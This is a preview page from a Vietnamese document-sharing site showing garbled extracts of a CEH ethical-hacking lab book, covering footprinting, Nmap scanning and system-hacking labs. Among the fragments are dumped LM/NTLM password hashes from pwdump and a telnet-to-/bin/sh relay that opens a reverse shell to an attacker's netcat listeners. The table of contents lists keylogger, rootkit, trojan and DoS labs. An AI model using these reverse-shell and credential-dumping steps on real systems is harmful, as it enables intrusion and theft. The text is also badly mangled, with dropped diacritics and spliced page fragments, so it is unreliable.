1. Trang chủ
  2. » Công Nghệ Thông Tin

Tài liệu CEH Lab book tiếng Việt phần 1 doc

37 744 3

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 37
Dung lượng 3,5 MB

Nội dung

Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 1 Mc Lc Bài 1: 3 FOOTPRINTING 3 I/ Gii thiu v Foot Print: 3 II/ Các bài thc hành: 3 Bài 1: Tìm thông tin v Domain 3 Bài 2: Tìm thông tin email 5 Bài 2: 7 SCANNING 7 I/ Gii thiu v Scanning: 7 II/ Các Bài thc hành 7 Bài thc hành 1: S dng Phn mm Nmap 7 Bài thc hành th 2: S dng phn mm Retina đ phát hin các vulnerabilities và tn công bng Metaesploit framework 13 Bài 3: 18 SYSTEM HACKING 18 I/ Gii thiu System Hacking: 18 II/ Thc hành các bài Lab 18 Bài 1: Crack password nt b ni b 18 Bài 2: S dng chng trình pwdump3v2 khi có đc 1 user administrator ca máy nn nhân đ có th tìm đc thông tin các user còn li 20 Bài Lab 3: Nâng quyn thông qua chng trình Kaspersky Lab 23 Bài Lab 4: S dng Keylogger 25 Bài Lab 5: S dng Rootkit và xóa Log file 27 Bài 4: 30 TROJAN và BACKDOOR 30 I/ Gii thiu v Trojan và Backdoor: 30 II/ Các bài thc hành: 30 Bài 1 S dng netcat: 30 Bài 2: S dng Trojan Beast và detect trojan 32 Mun s dng Trojan Beast, ta cn phi xây dng 1 file Server cài lên máy nn nhân, sau đó file server này s lng nghe  nhng port c đnh và t máy tn công ta s connect vào máy nn nhân thông qua cng này. 32 Bài 3: S dng Trojan di dng Webbase 35 Bài 5: 38 CÁC PHNG PHÁP SNIFFER 38 I/ Gii thiu v Sniffer 38 Bài 6: 65 Tn Công t chi dch v DoS 65 I/ Gii thiu: 65 II/ Mô t bài lab: 67 Bài Lab 1: DoS bng cách s dng Ping of death. 67 Bài lab 2: DoS 1 giao thc không s dng chng thc(trong bài s dng giao thc RIP) 69 Bài Lab 3: S dng flash đ DDoS 72 Bài 7: 74 Social Engineering 74 I/ Gii Thiu 74 Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 2 II/ Các bài Lab: 74 Bài Lab 1: Gi email nc đính kèm Trojan 74 Bài 8: 77 Session Hijacking 77 I/ Gii thiu: 77 II/ Thc hin bài Lab 77 Bài 9: 80 Hacking Web Server 80 I/ Gii thiu: 80 II/ Thc Hin bài lab 80 Bài Lab 1: Tn công Web Server Win 2003(li Apache) 80 Bài lab 2: Khai thác li ng dng Server U 84 Bài 10: 85 WEB APPLICATION HACKING 85 I/ Gii thiu: 85 II/ Các Bài Lab 85 Bài Lab 1: Cross Site Scripting 85 Bài Lab 2: Insufficient Data Validation 86 Bài Lab 3: Cookie Manipulation 88 Bài Lab 4: Authorization Failure 89 Bài 11: 91 SQL INJECTION 91 I/ Gii thiu v SQL Injection: 91 II/ Thc Hành Bài Lab 94 Bài 12: 101 WIRELESS HACKING 101 I/ Gii Thiu 101 II/ Thc hành bài Lab: 101 Bài 13: 105 VIRUS 105 I/ Gii thiu: (tham kho bài đc thêm) 105 II/ Thc hành Lab: 105 Bài 1: Virus phá hy d liu máy 105 Bài 2: Virus gaixinh lây qua tin nhn 107 Bài 14: 111 BUFFER OVERFLOW 111 I/ Lý thuyt 111 II/ Thc hành: 118 Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 3 Bài 1: FOOTPRINTING I/ Gii thiu v Foot Print: ây là k thut giúp hacker tìm kim thông tin v 1 doanh nghip, cá nhân hay t chc. Bn có th điu tra đc rt nhiu thông tin ca mc tiêu nh vào k thut này. Ví d trong phn thc hành th 1 chúng ta áp dng k thut này tìm kim thông tin v mt domain(ví d là www.itvietnam.com ) và xem th email liên lc ca domain này là ca ai, trong phn thc hành th 2 chúng ta truy tìm 1 danh sách các email ca 1 keywork cho trc, phng pháp này hiu qu cho các doanh nghip mun s dng marketing thông qua hình thc email v.v. Trong giai don này Hacker c gng tìm càng nhiu thông tin v doanh nghip(thông qua các kênh internet và phone) và cá nhân(thông qua email và hot đng ca cá nhân đó trên Internet), nu thc hin tt bc này Hacker có th xác đnh đc nên tn công vào đim yu nào ca chúng ta. Ví d mun tn công domain www.itvietnam.com thì Hacker phi bit đc đa ch email nào là ch cùa domain này và tìm cách ly password ca email thông qua tn công mail Server hay sniffer trong mng ni b v.v. Và cui cùng ly đc Domain này thông qua email ch này. II/ Các bài thc hành: Bài 1: Tìm thông tin v Domain Ta vào trang www.whois.net đ tìm kim thông tin và đánh vào domain mình mun tìm kim thông tin Sau đó ta nhn đc thông tin nh sau: Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 4 Registrar Name : BlueHost.Com Registrar Whois : whois.bluehost.com Registrar Homepage: http://www.bluehost.com/ Domain Name: ITVIETNAM.COM Created on : 1999-11-23 11:31:30 GMT Expires on : 2009-11-23 00:00:00 GMT Last modified on : 2007-07-30 03:15:11 GMT Registrant Info: (FAST-12836461) VSIC Education Corporation VSIC Education Corporation 78-80 Nguyen Trai Street, 5 District, HCM City, 70000 Vietnam Phone: +84.88363691 Fax : Email: jkow@itvietnam.com Last modified: 2007-03-23 04:12:24 GMT Administrative Info: (FAST-12836461) VSIC Education Corporation VSIC Education Corporation 78-80 Nguyen Trai Street, 5 District, HCM City, 70000 Vietnam Phone: +84.88363691 Fax : Email: jkow@itvietnam.com Last modified: 2007-03-23 04:12:24 GMT Technical Info: (FAST-12785240) Attn: itvietnam.com C/O BlueHost.Com Domain Privacy 1215 North Research Way Suite #Q 3500 Orem, Utah 84097 United States Phone: +1.8017659400 Fax : +1.8017651992 Email: whois@bluehost.com Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 5 Last modified: 2007-04-05 16:50:56 GMT Status: Locked Ngoài vic tìm thông tin v domain nh trên, chúng ta có th s dng các tin ích Reverse IP domain lookup đ có th xem th trên IP ca mình có bao nhiêu host chung vi mình. Vào link sau đây đ s dng tin ích này. http://www.domaintools.com/reverse-ip/ Vic tìm kim đc thông tin này rt cn thit vi Hacker, bi vì da vào thông tin s dng chung Server này, Hacker có th thông qua các Website b li trong danh sách trên và tn công vào Server t đó kim soát tt c các Website đc hosting trên Server. Bài 2: Tìm thông tin email Trong bài thc hành này, chúng ta s dng phn mm “1 st email address spider” đ tìm kim thông tin v các email. Hacker có th s dng phn mm này đ thu thp thêm thông tin v mail, hay lc ra các đi tng email khác nhau, tuy nhiên bn có th s dng tool này đ thu thp thêm thông tin nhm mc đích marketing, ví d bn cn tìm thông tin ca các email có đuôi là @vnn.vn hay @hcm.vnn.vn đ phc cho vic marketing sn phm. Ta có th cu hình vic s dng trang web nào đ ly thông tin, trong bài tôi s dng trang google.com đ tìm kim. Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 6 Sau đó đánh t khóa vnn.vn vào tag keyword Sau đó chúng ta đã có đc 1 list mail nh s dng trng trình này. Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 7 Bài 2: SCANNING I/ Gii thiu v Scanning: Scanning hay còn gi là quét mng là bc không th thiu đc trong quá trình tn công vào h thng mng ca hacker. Nu làm bc này tt Hacker s mau chóng phát hin đc li ca h thng ví d nh li RPC ca Window hay li trên phm mm dch v web nh Apache v.v. Và t nhng li này, hacker có th s dng nhng đon mã đc hi(t các trang web) đ tn công vào h  thng, ti t nht ly shell. Phn mm scanning có rt nhiu loi, gm các phm mm thng mi nh Retina, GFI, và các phn mm min phí nh Nmap,Nessus. Thông thng các n bn thng mi có th update các bug li mi t internet và có th dò tìm đc nhng li mi hn. Các phn mm scanning có th giúp ngi qun tr tìm đc li ca h thng, đng th i đa ra các gii pháp đ sa li nh update Service patch hay s dng các policy hp lý hn. II/ Các Bài thc hành Bài thc hành 1: S dng Phn mm Nmap Trc khi thc hành bài này, hc viên nên tham kho li giáo trình lý thuyt v các option ca nmap. Chúng ta có th s dng phn mm trong CD CEH v5, hay có th download bn mi nht t website: www.insecure.org . Phn mm nmap có 2 phiên bn dành cho Win và dành cho Linux, trong bài thc hành v Nmap, chúng ta s dng bn dành cho Window.  thc hành bài này, hc viên nên s dng Vmware và boot t nhiu h điu hành khác nhau nh Win XP sp2, Win 2003 sp1, Linux Fedora Core, Win 2000 sp4,v.v. Trc tiên s dng Nmap đ do thám th xem trong subnet có host nào up và các port các host này m, ta s dng lnh Nmap –h đ xem li các option ca Nmap, sau đó thc hin lnh “Nmap –sS 10.100.100.1-20”. Và sau đó đc kt qu sau: C:\Documents and Settings\anhhao>nmap -sS 10.100.100.1-20 Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:27 Pacific Standard Time Interesting ports on 10.100.100.1: Not shown: 1695 closed ports PORT STATE SERVICE 22/tcp open ssh 111/tcp open rpcbind MAC Address: 00:0C:29:09:ED:10 (VMware) Interesting ports on 10.100.100.6: Not shown: 1678 closed ports PORT STATE SERVICE Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 8 7/tcp open echo 9/tcp open discard 13/tcp open daytime 17/tcp open qotd 19/tcp open chargen 23/tcp open telnet 42/tcp open nameserver 53/tcp open domain 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 1027/tcp open IIS 1030/tcp open iad1 2105/tcp open eklogin 3389/tcp open ms-term-serv 8080/tcp open http-proxy MAC Address: 00:0C:29:59:97:A2 (VMware) Interesting ports on 10.100.100.7: Not shown: 1693 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS MAC Address: 00:0C:29:95:A9:03 (VMware) Interesting ports on 10.100.100.11: Not shown: 1695 filtered ports PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:0C:29:A6:2E:31 (VMware) Skipping SYN Stealth Scan against 10.100.100.13 because Windows does not support scanning your own machine (localhost) this way. All 0 scanned ports on 10.100.100.13 are Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 9 Interesting ports on 10.100.100.16: Not shown: 1689 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1433/tcp open ms-sql-s MAC Address: 00:0C:29:D6:73:6D (VMware) Interesting ports on 10.100.100.20: Not shown: 1693 closed ports PORT STATE SERVICE 135/tcp open msrpc 445/tcp open microsoft-ds 1000/tcp open cadlock 5101/tcp open admdog MAC Address: 00:15:C5:65:E3:85 (Dell) Nmap finished: 20 IP addresses (7 hosts up) scanned in 21.515 seconds Trong mng có tt c 7 host, 6 máy Vmware và 1 PC DELL. Bây gi bc tip theo ta tìm kim thông tin v OS ca các Host trên bng s dng lnh “ Nmap –v -O ip address” . C:\Documents and Settings\anhhao>nmap -vv -O 10.100.100.7 (xem chi tit Nmap quét) Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:46 Pacific Standard Time Initiating ARP Ping Scan at 10:46 Scanning 10.100.100.7 [1 port] Completed ARP Ping Scan at 10:46, 0.22s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 10:46 Completed Parallel DNS resolution of 1 host. at 10:46, 0.01s elapsed Initiating SYN Stealth Scan at 10:46 Scanning 10.100.100.7 [1697 ports] Discovered open port 1025/tcp on 10.100.100.7 Discovered open port 445/tcp on 10.100.100.7 Discovered open port 135/tcp on 10.100.100.7 Discovered open port 139/tcp on 10.100.100.7 Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 10 Completed SYN Stealth Scan at 10:46, 1.56s elapsed (1697 total ports) Initiating OS detection (try #1) against 10.100.100.7 Host 10.100.100.7 appears to be up good. Interesting ports on 10.100.100.7: Not shown: 1693 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS MAC Address: 00:0C:29:95:A9:03 (VMware) Device type: general purpose Running: Microsoft Windows 2003 OS details: Microsoft Windows 2003 Server SP1 OS Fingerprint: OS:SCAN(V=4.20%D=8/2%OT=135%CT=1%CU=36092%PV=Y%DS=1%G=Y%M=000C 29%TM=46B2187 OS:3%P=i686-pc-windows- windows)SEQ(SP=FF%GCD=1%ISR=10A%TI=I%II=I%SS=S%TS=0) OS:OPS(O1=M5B4NW0NNT00NNS%O2=M5B4NW0NNT00NNS%O3=M5B4NW0NNT0 0%O4=M5B4NW0NNT0 OS:0NNS%O5=M5B4NW0NNT00NNS%O6=M5B4NNT00NNS)WIN(W1=FAF0%W2=F AF0%W3=FAF0%W4=F OS:AF0%W5=FAF0%W6=FAF0)ECN(R=Y%DF=N%T=80%W=FAF0%O=M5B4NW0NN S%CC=N%Q=)T1(R=Y OS:%DF=N%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S= Z%A=S%F=AR%O=%RD OS:=0%Q=)T3(R=Y%DF=N%T=80%W=FAF0%S=O%A=S+%F=AS%O=M5B4NW0NNT 00NNS%RD=0%Q=)T4 OS:(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T =80%W=0%S=Z%A=S+% OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD= 0%Q=)T7(R=Y%DF=N% OS:T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%TOS=0 %IPL=B0%UN=0%RIP OS:L=G%RID=G%RIPCK=G%RUCK=G%RUL=G%RUD=G)IE(R=Y%DFI=S%T=80%T OSI=Z%CD=Z%SI=S% OS:DLI=S) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=255 (Good luck!) IPID Sequence Generation: Incremental [...]... hacker :10 18:BCE739534EA4E445AAD3B435B 514 04EE:5E7599F673DF11D5C5C4D950F 5BF 015 7::: hao123 :10 20:58F907D1C79C344DAAD3B435B 514 04EE:FD03071D 413 08B58B9DDBC6D 5576D78D::: VSIC Education Corporation Trang 21 Giáo trình bài t p C|EH Tài li u dành cho h c viên haoceh :10 16:B3FF8763A6B5CE26AAD3B435B 514 04EE:7AD94985F28454259BF2A038 21 FEC8DB::: hicehclass :10 23:B2BEF1B1582C2DC0AAD3B435B 514 04EE:D 619 8C25F8420A93301A579 2398CF94C::: IUSR _11 3SSR3JKXGW3N :10 03:449 913 C1CEC65E2A97074C07DBD2969F:9E6A4AF346F1A1F483... IUSR _11 3SSR3JKXGW3N :10 03:449 913 C1CEC65E2A97074C07DBD2969F:9E6A4AF346F1A1F483 3ABFA52ADA9462::: IWAM _11 3SSR3JKXGW3N :10 04:44 310 05ABF401D86F92DBAC26FDFD3B8 :18 8AA6E0737F12D16 D60F8B64F7AE1FA::: lylam :10 12:EE94DC327C009996AAD3B435B 514 04EE:7A63FB0793A85C960A775497C9 D738EE::: quyen:500:A00B 919 4BEDB81FEAAD3B435B 514 04EE:5C800F13A3CE86ED2540DD4E 7331E9A2::: SUPPORT_388945a0 :10 01: NO PASSWORD*********************:F791B19C488F4260723561D4F484EA09::: tam :10 14:NO PASSWORD*********************:NO... Host Name Server 1 8 TCP:53 DOMAIN - Domain Name Server 1 9 TCP:80 WWW-HTTP - World Wide Web HTTP (Hyper Text Transfer Protocol) 1 10 TCP :13 5 RPC-LOCATOR - RPC (Remote Procedure Call) Location 1 Service 11 TCP :13 9 NETBIOS-SSN - NETBIOS Session Service 1 12 TCP:445 MICROSOFT-DS - Microsoft-DS 1 13 TCP :10 25 LISTEN - listen 1 14 TCP :10 26 NTERM - nterm 1 15 TCP :10 30 IAD1 - BBN IAD 1 16 TCP: 210 3 ZEPHYR-CLT... BBD9D5E18::: anhhaoceh :10 19:B26C623F5254C6A 311 F64391B17C6CDE:98A2C048C77703D54BD0E88 887EFD68E::: ASPNET :10 06:7CACBCC121AC203CD8652FE65BEA4486:7D34A6E7504DFAF453D4 21 3660AE7D35::: Guest:5 01: NO PASSWORD*********************:NO PASSWORD*********************::: hack :10 22:CCF 915 5E3E7DB453AAD3B435B 514 04EE:3DBDE697D 716 90A769204BEB12 283678::: hacker :10 18:BCE739534EA4E445AAD3B435B 514 04EE:5E7599F673DF11D5C5C4D950F... t n công (17 2 .16 .84 .1) , m 2 c a s netcat l n l t l ng nghe trên c ng 80 + c a s Netcat (1) C:\>nc -nvv -l -p 80 listennng on [any] 80 connect to [17 2 .16 .84 .1] from [17 2 .16 .84.2] 10 55 pwd ls -la _ + c a s Netcat (2) C:\>nc -nvv -l -p 25 listening on [any] 25 connect to [17 2 .16 .84 .1] from (UNKNOWN) [17 2 .16 .84.2] 10 56 / total 17 1 drwxr-xr-x 17 root root 4096 Feb 5 16 :15 drwxr-xr-x 17 root root... Registry Access Available 1 6 telnet service 1 7 DCOM Enabled 1 8 Windows RPC Cumulative Patch 8287 41 Remote 1 9 Windows RPC DCOM interface buffer overflow 1 10 Windows RPC DCOM multiple vulnerabilities 1 11 Apache 1. 3.27 0x1A Character Logging DoS 1 VSIC Education Corporation Trang 14 Giáo trình bài t p C|EH Tài li u dành cho h c viên 12 Apache 1. 3.27 HTDigest Command Execution 1 13 Apache mod_alias... finished: 1 IP address (1 host up) scanned in 12 .485 seconds Tuy nhiên ta có th nh n di n r ng ây là 1 Server ch y d ch v SQL và Web Server, bây gi ta s d ng l nh “ Nmap –v –p 80 sV 10 .10 0 .10 0 .16 ” xác nh version c a IIS C:\Documents and Settings\anhhao>nmap -p 80 -sV 10 .10 0 .10 0 .16 Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 11 : 01 Pacific Standard Time Interesting ports on 10 .10 0 .10 0 .16 : PORT... “pwdump3.exe 10 .10 0 .10 0.6 c;\hao2003sp0 quyen”, và nh p vào password c a user quyen Ta m file hao2003sp0 xem trong thông tin aaa :10 15:NO PASSWORD*********************:NO PASSWORD*********************::: anhhao :10 10:DCAF9F8B002C73A0AAD3B435B 514 04EE:A923FFCC9BE38EBF40A5782 BBD9D5E18::: anhhao1 :10 11: DCAF9F8B002C73A0AAD3B435B 514 04EE:A923FFCC9BE38EBF40A5782 BBD9D5E18::: anhhao2 :10 13:DCAF9F8B002C73A0AAD3B435B 514 04EE:A923FFCC9BE38EBF40A5782... công (17 2 .16 .84 .1) , dùng /bin/sh k t xu t: n máy dùng [root@nan_nhan /]# telnet 17 2 .16 .84 .1 80 | /bin/sh | telnet 17 2 .16 .84 .1 25 /bin/sh: Trying: command not found /bin/sh: Connected: command not found /bin/sh: Escape: command not found Trying 17 2 .16 .84 .1 Connected to 17 2 .16 .84 .1 Escape character is '^]' _ Telnet trên máy n n nhân s chuy n t t c nh ng gì mà chúng ta gõ vào trong c a s Netcat (1) -... Buffer Overflow 1 14 ApacheBench multiple buffer overflows 1 15 HTTP TRACE method supported 1 TOP 20 OPEN PORTS The following is an overview of the top 20 open ports on your network Rank Port Number Description Count 1 TCP:7 ECHO - Echo 1 2 TCP:9 DISCARD - Discard 1 3 TCP :13 DAYTIME - Daytime 1 4 TCP :17 QOTD - Quote of the Day 1 5 TCP :19 CHARGEN - Character Generator 1 6 TCP:23 TELNET - Telnet 1 7 TCP:42 . gaixinh lây qua tin nhn 10 7 Bài 14 : 11 1 BUFFER OVERFLOW 11 1 I/ Lý thuyt 11 1 II/ Thc hành: 11 8 Giáo trình bài tp C|EH Tài liu dành cho hc. 89 Bài 11 : 91 SQL INJECTION 91 I/ Gii thiu v SQL Injection: 91 II/ Thc Hành Bài Lab 94 Bài 12 : 10 1 WIRELESS HACKING 10 1 I/ Gii Thiu 10 1 II/

Ngày đăng: 26/01/2014, 09:20

HÌNH ẢNH LIÊN QUAN

ph ng pháp này hi u qu cho các doanh ngh ip mu ns d ng marketing thông qua hình - Tài liệu CEH Lab book tiếng Việt phần 1 doc
ph ng pháp này hi u qu cho các doanh ngh ip mu ns d ng marketing thông qua hình (Trang 3)
Ta có th cu hình vic sd ng trang web nào đ ly thông tin, trong bài tôi sd ng - Tài liệu CEH Lab book tiếng Việt phần 1 doc
a có th cu hình vic sd ng trang web nào đ ly thông tin, trong bài tôi sd ng (Trang 5)
Sau khi cài ph nm m ti file keylogger, bây gi ta bt đu cu hình cho “ sn ph m” - Tài liệu CEH Lab book tiếng Việt phần 1 doc
au khi cài ph nm m ti file keylogger, bây gi ta bt đu cu hình cho “ sn ph m” (Trang 25)
Tip theo ta cu hình mail server đ relay, và thông ti nv process hin t h, p hn này - Tài liệu CEH Lab book tiếng Việt phần 1 doc
ip theo ta cu hình mail server đ relay, và thông ti nv process hin t h, p hn này (Trang 26)
Nh ta t hy trên hình, proccess ca cehkeyloger.exe có PID là 1236, bây gi tas ln process này b ng l nh “ fu –ph 1236” và th  xem l i các process b ng l nh “ tasklist” - Tài liệu CEH Lab book tiếng Việt phần 1 doc
h ta t hy trên hình, proccess ca cehkeyloger.exe có PID là 1236, bây gi tas ln process này b ng l nh “ fu –ph 1236” và th xem l i các process b ng l nh “ tasklist” (Trang 28)

TỪ KHÓA LIÊN QUAN

w